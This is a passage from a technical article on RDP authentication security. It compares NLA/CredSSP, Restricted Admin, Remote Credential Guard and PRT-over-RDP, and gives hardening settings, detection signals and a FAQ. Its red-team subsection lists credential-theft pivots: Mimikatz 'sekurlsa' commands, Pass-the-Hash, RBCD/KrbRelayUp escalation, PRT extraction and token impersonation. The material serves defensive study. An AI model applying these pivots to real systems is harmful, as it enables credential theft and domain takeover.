&lt;p&gt;The architectural answer (deprecate CredSSP wholly, replace it with RDS-AAD-Auth for every RDP path) is not on Microsoft&apos;s public roadmap. MS-CSSP&apos;s current revision is 21.0, dated April 23, 2024 [@mscssp-index] -- the protocol is actively maintained, not deprecated. Operationally, CredSSP is a permanent fixture of any Windows estate that includes on-premises identity.&lt;/p&gt;
&lt;h3&gt;Limit 3: The RBCD-against-TERMSRV class&lt;/h3&gt;
&lt;p&gt;Restricted Admin closes credential delegation. It does not close the machine-identity-as-attack-primitive class. Any principal that can write &lt;code&gt;msDS-AllowedToActOnBehalfOfOtherIdentity&lt;/code&gt; on a target&apos;s computer object can S4U2self + S4U2proxy a &lt;code&gt;TERMSRV/&amp;lt;target&amp;gt;&lt;/code&gt; ticket and RDP in as any account -- including a Domain Admin [@shamir-wagging]. Dec0ne&apos;s KrbRelayUp productionises this as &quot;a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)&quot; [@krbrelayup].&lt;/p&gt;
&lt;p&gt;The phrase &quot;no-fix&quot; is doing real work. The chain depends on default LDAP-signing settings, default kerberos delegation behaviour for resource-based constrained delegation, and the user-creatable computer object quota of &lt;code&gt;ms-DS-MachineAccountQuota = 10&lt;/code&gt; [@shamir-wagging] -- four configurations that are independently defensible per protocol but that compose into the chain. Tightening any one of them mitigates KrbRelayUp; Microsoft has not chosen to do so by default.&lt;/p&gt;
&lt;h3&gt;Limit 4: The Entra-only / on-prem-only gap&lt;/h3&gt;
&lt;p&gt;PRT-over-RDP requires both endpoints to be Microsoft-Entra-joined or hybrid-joined [@msl-prtrdp-mstsc, @msl-avdsso]. Restricted Admin and Remote CG require Kerberos and on-premises Active Directory. The two architectures do not compose: a non-hybrid Entra-joined estate cannot deploy Restricted Admin or Remote CG; an on-prem-AD estate cannot deploy PRT-over-RDP. Hybrid join is the bridging primitive, but it has its own configuration cost (Entra Connect, device-write-back, certificate trust, password hash sync), and many estates have hybrid-join enabled for only a subset of devices.&lt;/p&gt;

The five RDP modes occupy different points on a four-axis Pareto frontier: (no-credential-leak × SSO × universality × Kerberos-compatibility). No mode dominates any other on all four axes simultaneously.&lt;ul&gt;
&lt;li&gt;Classic credential delegation gives universality and SSO and Kerberos-compatibility, at the cost of credential-leak protection.&lt;/li&gt;
&lt;li&gt;NLA via CredSSP adds pre-auth-RCE gating, but the credential-leak axis is identical to classic.&lt;/li&gt;
&lt;li&gt;Restricted Admin gives credential-leak protection and Kerberos-compatibility, at the cost of SSO and the universality of the &quot;any user&quot; property (because of the Administrators-group requirement).&lt;/li&gt;
&lt;li&gt;Remote Credential Guard gives credential-leak protection and SSO, at the cost of universality (Kerberos-only).&lt;/li&gt;
&lt;li&gt;PRT-over-RDP gives credential-leak protection and SSO and modern phishing-resistant authentication, at the cost of Kerberos-compatibility and the Entra-joined-everywhere requirement.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The operator&apos;s job is composition: pick the mode that matches each RDP pair&apos;s constraints, accept that two of the four axes will fail for that pair, and use the other modes for the other pairs. A typical 2026 enterprise pool runs (at least) NLA-mandatory classic for legacy, Restricted Admin for admin-tier, Remote CG for user-tier domain RDP, and PRT-over-RDP for AVD. Four authentication modes on one estate is the normal state.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;Three of the four limits are bounded: they may shrink as Microsoft deprecates NTLM, ships VBS-trustlet protection for CloudAP on session hosts, or unifies the Entra and on-prem identity surfaces. One is architectural and applies to every authentication protocol ever proposed: &lt;code&gt;SYSTEM&lt;/code&gt; on the target equals the user&apos;s identity for as long as the user stays connected. The next section walks the active research where the bounded limits are still moving.&lt;/p&gt;
&lt;h2&gt;11. Open Problems: Where Research and Operations Are Still Moving&lt;/h2&gt;
&lt;p&gt;Five open problems sit on the RDP authentication stack right now. Three are research-class. Two are operational-class. None has a &quot;just ship a patch&quot; answer.&lt;/p&gt;
&lt;h3&gt;Open Problem 1: PRT extraction at the session host&lt;/h3&gt;
&lt;p&gt;A session host that serves N concurrent RDP-in connections with PRT-over-RDP caches at least N CloudAP entries. A SYSTEM adversary on the session host can dump all of them. Dirk-jan Mollema&apos;s August 2020 follow-up to his original PRT abuse research [@mollema-prt2] describes the underlying primitive in collaboration with Benjamin Delpy (Mimikatz author). The verbatim quote is decisive:&lt;/p&gt;

Around the same time Benjamin Delpy took up my &apos;challenge&apos; of recovering PRT data from lsass with mimikatz. We combined forces and ended up with tooling that is not only able to extract the PRT and associated cryptographic keys (such as the session key) from memory, but can also use these keys to create new SSO cookies or modify existing ones. Interesting enough, it turns out that despite the session key of the PRT is stored in the TPM whenever possible, this doesn&apos;t prevent us from extracting the PRT and the required information to create SSO cookies. The result of this is that regardless of whether the PRT is protected by the TPM or not, with Administrator access it is possible to extract the PRT from LSASS and use the PRT on a different device than it was issued to. -- Dirk-jan Mollema, *Digging Further Into the Primary Refresh Token* (2020) [@mollema-prt2]
&lt;p&gt;That property -- the PRT and session key are recoverable from CloudAP &lt;code&gt;lsass.exe&lt;/code&gt; memory irrespective of TPM protection -- holds on the &lt;em&gt;receiving&lt;/em&gt; session host the same way it holds on the &lt;em&gt;issuing&lt;/em&gt; device. This is the 2026 mirror of the 2008 &quot;RDP into the Citrix jump server and dump credentials&quot; problem.&lt;/p&gt;
&lt;p&gt;The architectural answer is to run CloudAP inside a VBS trustlet (analogous to &lt;code&gt;LsaIso.exe&lt;/code&gt; for NTLM and Kerberos) on every session host. Microsoft has not publicly committed to that work. The original PRT post [@mollema-prt1] notes that &quot;if there is no TPM the keys are stored in software... If a TPM is present, the keys required to request or use the PRT are protected by the TPM and can&apos;t be extracted under normal circumstances&quot; -- but &quot;under normal circumstances&quot; excludes the &lt;code&gt;SYSTEM&lt;/code&gt;-on-target adversary the session-host scenario assumes.&lt;/p&gt;
&lt;h3&gt;Open Problem 2: CredSSP is not deprecable&lt;/h3&gt;
&lt;p&gt;MS-CSSP revision 21.0 (April 23, 2024) [@mscssp-index] is a maintained protocol; no Microsoft roadmap deprecates it. The role transitions from &quot;the authentication layer for RDP and WinRM&quot; to &quot;the compatibility shim for everything that does not speak RDS-AAD-Auth,&quot; but compatibility shims do not retire in the absence of a forcing function. Every CredSSP CVE in the next decade lands on a still-deployed surface. The &lt;code&gt;AllowEncryptionOracle&lt;/code&gt; deployment pattern [@msl-kb4093492] is not the last of its kind.&lt;/p&gt;
&lt;h3&gt;Open Problem 3: Remote CG NTLM exclusion and the hybrid-estate user experience&lt;/h3&gt;
&lt;p&gt;Remote Credential Guard is Kerberos-only [@msl-rcg]. The &lt;code&gt;RestrictedRemoteAdministration&lt;/code&gt; GPO mode 3 is the composite &quot;Restrict credential delegation&quot; policy that prefers Remote CG and falls back to Restricted Admin when Remote CG cannot complete [@msl-rcg].&lt;/p&gt;
&lt;p&gt;The result is a fragmented user experience: on Monday a user RDPs to &lt;code&gt;server01&lt;/code&gt; and gets Remote CG (SSO works); on Tuesday the user RDPs to &lt;code&gt;server02&lt;/code&gt; whose DC trust path has a transient routing problem and gets Restricted Admin (SSO does not work). The user observes &quot;RDP to server02 is broken&quot; and files a ticket; the platform team observes &quot;the GPO fall-back is working as designed.&quot; This pattern persists until NTLM is universally removed from the estate, which is itself an open multi-year project. See the companion &lt;em&gt;NTLMless&lt;/em&gt; article on this site for the wider deprecation arc.&lt;/p&gt;
&lt;h3&gt;Open Problem 4: The Entra / on-prem composition gap&lt;/h3&gt;
&lt;p&gt;Real enterprise estates are a Venn diagram of Entra-only desktops, hybrid-joined Windows 11 laptops, and on-prem-AD-only servers. PRT-over-RDP works between Entra-joined and hybrid-joined endpoints [@msl-prtrdp-mstsc]; Restricted Admin and Remote CG work between Kerberos-routable endpoints; the four cells in the 2x2 ({client-Entra, client-AD} x {target-Entra, target-AD}) have different authentication paths. Hybrid join bridges the two architectures for devices that support it. A conjecture worth stating plainly: the two architectures will not fully converge before 2030. The intermediate state -- four authentication modes running on the same estate at the same time -- is the steady state, not a transition.&lt;/p&gt;
&lt;h3&gt;Open Problem 5: Windows 11 24H2 KIR as a deployment-fault recovery surface&lt;/h3&gt;
&lt;p&gt;In early 2025, Windows 11 24H2 shipped an authentication-stack change that broke CredSSP-mediated RDP in a subset of configurations, manifesting as session hangs at the login screen or 65-second disconnects mid-session. Microsoft rolled out a Known Issue Rollback (&quot;KIR&quot;) via Group Policy in March 2025; the policy name is widely attributed in industry press as &quot;Windows 11 24H2 and Windows Server 2025 KB5053598 250314_20401 Known Issue Rollback.&quot; The Windows 11 24H2 release-health page now reads &quot;There are no active known issues at this time&quot; as of March 27, 2025 [@msl-24h2-status], indicating the KIR cycle has resolved.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Known Issue Rollback is now a primary operational tool for managing authentication-stack regressions in Windows. When a feature update breaks CredSSP, RDP, or any other load-bearing authentication primitive, the response is no longer &quot;wait for the next monthly patch&quot;; it is &quot;push the KIR-disable Group Policy through your management plane.&quot; Operators should be familiar with the KIR mechanism &lt;em&gt;before&lt;/em&gt; the next regression cycle. The 2025 24H2 RDP regression [@msl-24h2-status] is the worked example.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Open Problem 6: QUIC transport and the network-layer detection surface&lt;/h3&gt;
&lt;p&gt;AVD RDP Shortpath for public networks has been GA since late 2022 [@tc-shortpath-blog, @msl-shortpath]; the TURN-relayed variant is GA from late 2024. QUIC is specified in RFC 9000 [@rfc-9000] and replaces TCP/3389 + TLS with UDP/&amp;lt;ephemeral&amp;gt; + QUIC. The IOC surface for &quot;RDP session in progress&quot; changes from a TLS handshake plus CredSSP TS Request/Response on TCP/3389 to a QUIC handshake plus STUN/ICE candidate exchange on a UDP port assigned at runtime.&lt;/p&gt;
&lt;p&gt;Network-detection engineering for this surface has not finished re-tuning. A reasonable conjecture: the QUIC detection surface stabilises by 2027 around per-tenant Conditional Access app-ID telemetry (sign-in log entries for &lt;code&gt;a4a365df-50f1-4397-bc59-1a1564b8bb9c&lt;/code&gt; [@msl-prtrdp-mstsc]) rather than network-layer packet signatures.&lt;/p&gt;
&lt;p&gt;These open problems share a common shape. They are all about &lt;em&gt;composition&lt;/em&gt;. The five modes have to interoperate; the credential-isolation has to extend to the session host; the detection has to span TCP and QUIC. None of them has a feature-shaped answer. The next section walks the practical guide for making the existing primitives work in your environment today.&lt;/p&gt;
&lt;h2&gt;12. Practical Guide, FAQ, and Closing&lt;/h2&gt;
&lt;p&gt;Here is what to do with this stack this week, depending on which side of the wire you live on.&lt;/p&gt;
&lt;h3&gt;For the administrator / platform engineer&lt;/h3&gt;
&lt;p&gt;The four configurations below are the universal baseline. Set them everywhere; then choose a higher-level mode per RDP pair.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Enforce NLA.&lt;/strong&gt; GPO: &lt;em&gt;Computer Configuration -&amp;gt; Administrative Templates -&amp;gt; Windows Components -&amp;gt; Remote Desktop Services -&amp;gt; Remote Desktop Session Host -&amp;gt; Security -&amp;gt; Require user authentication for remote connections by using Network Level Authentication&lt;/em&gt;. Verify with PowerShell: &lt;code&gt;(Get-WmiObject -Class Win32_TSGeneralSetting -Namespace root\CIMV2\TerminalServices -Filter &quot;TerminalName=&apos;RDP-Tcp&apos;&quot;).UserAuthenticationRequired&lt;/code&gt; returns &lt;code&gt;1&lt;/code&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Enforce &lt;code&gt;AllowEncryptionOracle = 0&lt;/code&gt;.&lt;/strong&gt; Set &quot;Encryption Oracle Remediation&quot; to &quot;Force Updated Clients&quot; under &lt;em&gt;Computer Configuration -&amp;gt; Administrative Templates -&amp;gt; System -&amp;gt; Credentials Delegation&lt;/em&gt;. Verify with &lt;code&gt;Get-ItemProperty &apos;HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters&apos;&lt;/code&gt; -- the &lt;code&gt;AllowEncryptionOracle&lt;/code&gt; value should be &lt;code&gt;0&lt;/code&gt; [@msl-kb4093492].&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Deploy Restricted Admin or Remote CG.&lt;/strong&gt; Set the &lt;code&gt;RestrictedRemoteAdministration&lt;/code&gt; GPO mode under &quot;Restrict delegation of credentials to remote servers&quot; to &lt;code&gt;1&lt;/code&gt; (Require Restricted Admin), &lt;code&gt;2&lt;/code&gt; (Require Remote Credential Guard), or &lt;code&gt;3&lt;/code&gt; (Restrict credential delegation -- the composite that prefers Remote CG and falls back to Restricted Admin when Remote CG cannot complete). Pair with the target-side &quot;Remote host allows delegation of nonexportable credentials&quot; GPO [@msl-rcg].&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Enable PRT-over-RDP for Entra-joined estates.&lt;/strong&gt; Distribute &lt;code&gt;.rdp&lt;/code&gt; files with &lt;code&gt;enablerdsaadauth:i:1&lt;/code&gt; [@msl-rdp-files]; gate sign-in via Conditional Access policy on the application &lt;code&gt;a4a365df-50f1-4397-bc59-1a1564b8bb9c&lt;/code&gt; [@msl-prtrdp-mstsc]; pair with Windows Hello for Business or FIDO2 for phishing-resistant primary authentication.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Before enabling Remote CG on any target, inventory the NTLM-only paths into it. Workgroup machines, machines whose target SPN registration is incomplete, machines reachable only across DC-isolating firewall rules -- all of them will refuse the Remote CG negotiation when Kerberos cannot complete.&lt;/p&gt;

The exact GPO and registry settings for the four-baseline configuration:&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;NLA&lt;/strong&gt;: &lt;code&gt;Computer Configuration -&amp;gt; Administrative Templates -&amp;gt; Windows Components -&amp;gt; Remote Desktop Services -&amp;gt; Remote Desktop Session Host -&amp;gt; Security -&amp;gt; Require user authentication for remote connections by using Network Level Authentication&lt;/code&gt;. Registry: &lt;code&gt;HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\UserAuthentication = 1&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;AllowEncryptionOracle&lt;/strong&gt;: &lt;code&gt;Computer Configuration -&amp;gt; Administrative Templates -&amp;gt; System -&amp;gt; Credentials Delegation -&amp;gt; Encryption Oracle Remediation -&amp;gt; Force Updated Clients&lt;/code&gt;. Registry: &lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters\AllowEncryptionOracle = 0&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Restricted Admin / Remote CG&lt;/strong&gt;: &lt;code&gt;Computer Configuration -&amp;gt; Administrative Templates -&amp;gt; System -&amp;gt; Credentials Delegation -&amp;gt; Restrict delegation of credentials to remote servers&lt;/code&gt;. Registry: &lt;code&gt;HKLM\Software\Policies\Microsoft\Windows\CredentialsDelegation\RestrictedRemoteAdministration = 1|2|3&lt;/code&gt; (1 = Require Restricted Admin; 2 = Require Remote Credential Guard; 3 = Restrict credential delegation -- the composite that prefers Remote CG and falls back to Restricted Admin when Remote CG cannot complete) [@msl-rcg].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Target-side trust&lt;/strong&gt;: &lt;code&gt;Computer Configuration -&amp;gt; Administrative Templates -&amp;gt; System -&amp;gt; Credentials Delegation -&amp;gt; Remote host allows delegation of nonexportable credentials -&amp;gt; Enabled&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Apply via Group Policy, Intune ADMX, or local policy. Reboot is not required for these settings to take effect, but new RDP connections must be opened after the policy applies for the negotiation to reflect the new state.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;h3&gt;For the security researcher&lt;/h3&gt;
&lt;p&gt;The wire-level distinction between modes is observable. Capture an RDP handshake with Wireshark (the RDP dissector is built-in). The &lt;code&gt;RDP_NEG_REQ&lt;/code&gt; and &lt;code&gt;RDP_NEG_RSP&lt;/code&gt; packets show the &lt;code&gt;requestedProtocols&lt;/code&gt; and &lt;code&gt;selectedProtocol&lt;/code&gt; fields and the Restricted Admin / Remote CG flag bits. &lt;code&gt;PROTOCOL_HYBRID = 0x02&lt;/code&gt; plus &lt;code&gt;RESTRICTED_ADMIN_MODE_SUPPORTED = 0x08&lt;/code&gt; in the response indicates the negotiated CredSSP sub-mode.&lt;/p&gt;
&lt;p&gt;{&lt;code&gt;// MS-RDPBCGR selectedProtocol bitmask: see learn.microsoft.com/.../b2975bdc function decodeNegRsp(selectedProtocol, flags) {   const protocols = [];   if ((selectedProtocol &amp;amp; 0x01) !== 0) protocols.push(&quot;PROTOCOL_SSL (TLS)&quot;);   if ((selectedProtocol &amp;amp; 0x02) !== 0) protocols.push(&quot;PROTOCOL_HYBRID (CredSSP)&quot;);   if ((selectedProtocol &amp;amp; 0x04) !== 0) protocols.push(&quot;PROTOCOL_RDSTLS&quot;);   if ((selectedProtocol &amp;amp; 0x08) !== 0) protocols.push(&quot;PROTOCOL_HYBRID_EX&quot;);   if ((selectedProtocol &amp;amp; 0x10) !== 0) protocols.push(&quot;PROTOCOL_RDSAAD (Entra)&quot;);   if (protocols.length === 0) protocols.push(&quot;PROTOCOL_RDP (classic)&quot;);   const subModes = [];   if ((flags &amp;amp; 0x08) !== 0) subModes.push(&quot;Restricted Admin supported&quot;);   if ((flags &amp;amp; 0x10) !== 0) subModes.push(&quot;Remote Credential Guard supported&quot;);   console.log(&quot;Protocols:&quot;, protocols.join(&quot; + &quot;));   console.log(&quot;Sub-modes:&quot;, subModes.length ? subModes.join(&quot;, &quot;) : &quot;none&quot;); } // Example: PROTOCOL_HYBRID + Remote CG flag decodeNegRsp(0x02, 0x10); // Example: PROTOCOL_RDSAAD (PRT-over-RDP) decodeNegRsp(0x10, 0x00);&lt;/code&gt;}&lt;/p&gt;
&lt;p&gt;On the target, the distinction between Restricted Admin and the other modes shows up in the Windows event log. Event 4624 (logon-type 10, RemoteInteractive) records the subject; for Restricted Admin the subject is &lt;code&gt;TARGET$&lt;/code&gt; (the machine account) while for classic, Remote CG, and PRT-over-RDP it is the user&apos;s account. A quick check: open an elevated &lt;code&gt;cmd&lt;/code&gt; inside the RDP session and run &lt;code&gt;whoami&lt;/code&gt;. Returns &lt;code&gt;&amp;lt;target&amp;gt;$&lt;/code&gt; under Restricted Admin; returns the user&apos;s domain or Entra account otherwise.&lt;/p&gt;
&lt;p&gt;{`&lt;/p&gt;
Mirrors four PowerShell checks an operator runs on a Windows target.
&lt;p&gt;checks = {
    &quot;NLA required&quot;: &quot;(Get-WmiObject Win32_TSGeneralSetting -Namespace root/CIMV2/TerminalServices -Filter \&quot;TerminalName=&apos;RDP-Tcp&apos;\&quot;).UserAuthenticationRequired&quot;,
    &quot;AllowEncryptionOracle == 0&quot;: &quot;(Get-ItemProperty &apos;HKLM:/Software/Microsoft/Windows/CurrentVersion/Policies/System/CredSSP/Parameters&apos;).AllowEncryptionOracle&quot;,
    &quot;Restricted Admin GPO&quot;: &quot;(Get-ItemProperty &apos;HKLM:/Software/Policies/Microsoft/Windows/CredentialsDelegation&apos;).RestrictedRemoteAdministration&quot;,
    &quot;PRT-over-RDP opt-in&quot;: &quot;Select-String -Pattern &apos;enablerdsaadauth:i:1&apos; (Get-ChildItem -Recurse -Filter *.rdp)&quot;,
}
expected = {&quot;NLA required&quot;: 1, &quot;AllowEncryptionOracle == 0&quot;: 0,
            &quot;Restricted Admin GPO&quot;: &quot;1, 2, or 3&quot;, &quot;PRT-over-RDP opt-in&quot;: &quot;present in .rdp file&quot;}
for label, cmd in checks.items():
    print(f&quot;{label}: expect {expected[label]}; run -&amp;gt; {cmd}&quot;)
`}&lt;/p&gt;
&lt;p&gt;For PRT-over-RDP detection, the highest-fidelity signal lives in Microsoft Entra ID&apos;s sign-in logs: a successful sign-in entry against the application ID &lt;code&gt;a4a365df-50f1-4397-bc59-1a1564b8bb9c&lt;/code&gt; [@msl-prtrdp-mstsc] indicates an RDP session was authenticated using the Entra path. Correlate with the target&apos;s local event log for the same user / timestamp to verify session establishment.&lt;/p&gt;
&lt;h3&gt;For the red-team operator&lt;/h3&gt;
&lt;p&gt;The post-exploitation pivots differ by mode, as the four &lt;code&gt;sekurlsa::logonpasswords&lt;/code&gt; dumps in §1 illustrated:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Classic / NLA&lt;/strong&gt;: Pass-the-Hash against the target&apos;s &lt;code&gt;lsass.exe&lt;/code&gt; cache is trivial. &lt;code&gt;sekurlsa::logonpasswords&lt;/code&gt; returns user&apos;s NT-OWF.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Restricted Admin&lt;/strong&gt;: PtH yields the target&apos;s machine account (&lt;code&gt;TARGET$&lt;/code&gt;), not the user. Pivot: RBCD against &lt;code&gt;TERMSRV&lt;/code&gt; via the Wagging-the-Dog chain [@shamir-wagging] or KrbRelayUp [@krbrelayup].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Remote Credential Guard&lt;/strong&gt;: PtH yields nothing useful for the user; the credential never reached the target. Pivot: in-session impersonation via SYSTEM-on-target while the user is connected; use &lt;code&gt;OpenProcessToken&lt;/code&gt; against a user-session process.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;PRT-over-RDP&lt;/strong&gt;: No NTLM hash, no Kerberos ticket. Pivot: PRT extraction (&lt;code&gt;sekurlsa::cloudap&lt;/code&gt;) from the target&apos;s CloudAP cache; the Dirk-jan Mollema PRT-cookie-mint flow [@mollema-prt2] applies.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;For the detection engineer&lt;/h3&gt;
&lt;p&gt;Five signal sources, ranked by fidelity:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The &lt;code&gt;selectedProtocol&lt;/code&gt; and &lt;code&gt;flags&lt;/code&gt; fields in the &lt;code&gt;RDP_NEG_RSP&lt;/code&gt; packet identify the negotiated mode at the wire.&lt;/li&gt;
&lt;li&gt;Event 4624 (logon-type 10) on the target identifies the session principal: machine-account name under Restricted Admin, user name otherwise.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational&lt;/code&gt; Event ID 1149 records successful RDP session connections.&lt;/li&gt;
&lt;li&gt;RDS Gateway connection logs, if a Gateway is in the path.&lt;/li&gt;
&lt;li&gt;Microsoft Entra ID sign-in logs for the application ID &lt;code&gt;a4a365df-50f1-4397-bc59-1a1564b8bb9c&lt;/code&gt; [@msl-prtrdp-mstsc] for PRT-over-RDP sessions.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;For BlueKeep-class detection on patched estates: the &lt;code&gt;MS_T120&lt;/code&gt; channel name appearing in an RDP &lt;code&gt;Erect Domain Request&lt;/code&gt; or &lt;code&gt;Attach User Request&lt;/code&gt; is a high-fidelity IOC. Legitimate clients do not request that channel by name [@wiki-bluekeep].&lt;/p&gt;

No. NLA is the *policy* on the RDP server that requires authentication before the RDP session is established (before the basic-settings exchange and virtual-channel binding). NLA is *implemented by* CredSSP -- the Credential Security Support Provider, specified in MS-CSSP [@mscssp-index] -- running over TLS. When operators say &quot;we require NLA,&quot; they mean &quot;we accept only `requestedProtocols = PROTOCOL_HYBRID` or `PROTOCOL_HYBRID_EX`,&quot; both of which select CredSSP under the hood [@rdpbcgr-credssp].

No. NLA prevents pre-authentication remote code execution in the RDP channel-setup code (mitigating BlueKeep [@wiki-bluekeep]) and reduces denial-of-service exposure. NLA does not change what the target&apos;s `lsass.exe` ends up holding at the end of the CredSSP exchange. A CredSSP `TSPasswordCreds` exchange ends with the user&apos;s password or NT-OWF cached on the target. Mimikatz `sekurlsa::logonpasswords` works against a 2012-era NLA-authenticated target identically to a 1998-era classic-RDP target.

No. Restricted Admin makes the target act as *itself*: the user&apos;s session runs as the target&apos;s machine account, the target sees no user credentials, but the connecting user must already be a local Administrator on the target [@msl-rcg]. Remote Credential Guard makes the target forward operations *back to the caller*: the session runs as the user, SSO works, the connecting user only needs Remote Desktop Users group membership on the target, but the path is Kerberos-only [@msl-rcg]. Restricted Admin gave up SSO to gain universality. Remote CG kept SSO at the cost of NTLM compatibility.

Partly. Remote Credential Guard always redirects Kerberos challenges to the caller&apos;s `lsass.exe`. The long-lived signing material lives in the caller&apos;s VTL1 `LsaIso.exe` trustlet *only if* the caller has local Credential Guard enabled. Without local Credential Guard, the material is in regular user-mode `lsass.exe` on the caller. The protocol works in both cases; the protection from a post-compromise of the caller is stronger with local Credential Guard on.

No. BlueKeep (CVE-2019-0708) is a use-after-free in the `MS_T120` virtual-channel binding inside `termdd.sys`, reachable in the RDP channel-setup phase *before* NLA gating completes [@wiki-bluekeep, @nvd-2019-0708]. NLA shipped natively in every BlueKeep-affected operating system from Windows Vista onward (Windows 7, Server 2008, Server 2008 R2); Windows XP and Server 2003 did not ship NLA natively but could be retrofitted via KB951608 (March 2009). The mitigation guidance &quot;enable NLA&quot; worked because NLA *gates* that pre-auth code path behind a successful CredSSP handshake. BlueKeep is &quot;a vulnerability in the channel-setup code reachable when NLA is not enforced,&quot; not &quot;a vulnerability in an era predating NLA.&quot;

No. Microsoft Entra single sign-on for Remote Desktop shipped in the October 11, 2022 cumulative updates: KB5018418 for Windows 11, KB5018410 for Windows 10 20H2 and later, and KB5018421 for Windows Server 2022 [@msl-prtrdp-mstsc, @msl-kb5018418]. The 2025 angles are the Windows 11 24H2 broad GA wave (October 2024) and the March 2025 Known Issue Rollback for a 24H2 RDP regression [@msl-24h2-status]. The Entra-PRT-backed RDP authentication mode itself has been generally available since late 2022.

Only for Azure Virtual Desktop and Windows 365. On-premises RDP defaults to TCP/3389 with TLS. RDP-over-QUIC is implemented in AVD&apos;s RDP Shortpath feature, with four variants documented in Microsoft Learn covering managed networks, ICE/STUN traversal, public networks via ICE/STUN, and TURN-relayed paths [@msl-shortpath]. Public-networks GA was announced in late 2022 [@tc-shortpath-blog]; the TURN-relayed variant is GA in late 2024. The QUIC transport itself is RFC 9000 [@rfc-9000]. The authentication stack above the transport is unchanged from TCP-based RDP.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The five modes coexist because each makes a different Pareto trade-off, and no estate has the luxury of running just one. The matrix is the artifact you live with.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;From password-in-the-pipe to cloud-issued session, every generation of RDP authentication has closed exactly the failure mode that motivated the next. Classic delegation made the credential-aggregation problem visible; NLA gated the pre-auth channel and inadvertently introduced its own CVE class. Restricted Admin gave up the user&apos;s identity to stop delivering credentials; Remote Credential Guard recovered the identity at the cost of Kerberos-only routing; PRT-over-RDP abandoned both Kerberos and NTLM in favour of Entra-issued cookies bound to per-application Conditional Access policies.&lt;/p&gt;
&lt;p&gt;The residual classes -- RBCD against &lt;code&gt;TERMSRV&lt;/code&gt;, PRT extraction at the session host, the in-session SYSTEM-on-target floor -- are what is left, and at least one of them is architectural rather than fixable.&lt;/p&gt;
&lt;p&gt;The four &lt;code&gt;sekurlsa::logonpasswords&lt;/code&gt; dumps in §1 are no longer four mysteries. They are four readings of a single matrix: which &lt;code&gt;requestedProtocols&lt;/code&gt; byte the client offered, which &lt;code&gt;flags&lt;/code&gt; bits the server accepted, and which credential payload (or which absence of a credential payload) the target received before it built the user&apos;s session. The protocol selectors are public. The trade-offs are public. The matrix is yours to compose, RDP pair by RDP pair, with full knowledge of what each choice puts on the wire and what it leaves in &lt;code&gt;lsass.exe&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;rdp-security-nla-restricted-admin-remote-credential-guard-and-the-prt-over-rdp-pivot&quot; keyTerms={[
  { term: &quot;NLA&quot;, definition: &quot;Network Level Authentication: the server-side policy that requires the client to authenticate via CredSSP before the RDP session is established.&quot; },
  { term: &quot;CredSSP&quot;, definition: &quot;Credential Security Support Provider, the wire protocol that NLA uses: TLS + SPNEGO + Kerberos or NTLM + TSCredentials.&quot; },
  { term: &quot;TSPasswordCreds&quot;, definition: &quot;The CredSSP payload carrying the user&apos;s password or NT-OWF to the target; empty in Restricted Admin mode.&quot; },
  { term: &quot;TSRemoteGuardCreds&quot;, definition: &quot;The CredSSP payload used by Remote Credential Guard, carrying a redirect handle rather than a credential.&quot; },
  { term: &quot;Restricted Admin&quot;, definition: &quot;CredSSP sub-mode that sends empty credentials and runs the user&apos;s session as the target&apos;s machine account.&quot; },
  { term: &quot;Remote Credential Guard&quot;, definition: &quot;CredSSP sub-mode that forwards every Kerberos operation back to the caller&apos;s lsass via RPC, keeping credentials off the target.&quot; },
  { term: &quot;PRT&quot;, definition: &quot;Primary Refresh Token, the long-lived Entra refresh token bound to a Microsoft-Entra-joined device, signed by a TPM-protected key where possible.&quot; },
  { term: &quot;PROTOCOL_RDSAAD&quot;, definition: &quot;RDP_NEG_REQ.requestedProtocols value 0x10 selecting the RDS-AAD-Auth protocol used by PRT-over-RDP.&quot; },
  { term: &quot;RBCD&quot;, definition: &quot;Resource-Based Constrained Delegation; lets a target&apos;s computer object specify which principals can delegate to it via the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.&quot; },
  { term: &quot;BlueKeep&quot;, definition: &quot;CVE-2019-0708, a pre-auth RCE in the MS_T120 virtual-channel handler in termdd.sys, reachable when NLA is not enforced.&quot; }
]} questions={[
  { q: &quot;Why does enabling NLA not prevent Pass-the-Hash?&quot;, a: &quot;Because NLA controls when authentication happens, not what is delivered. The CredSSP exchange still ends with the user&apos;s NT-OWF in the target&apos;s lsass.&quot; },
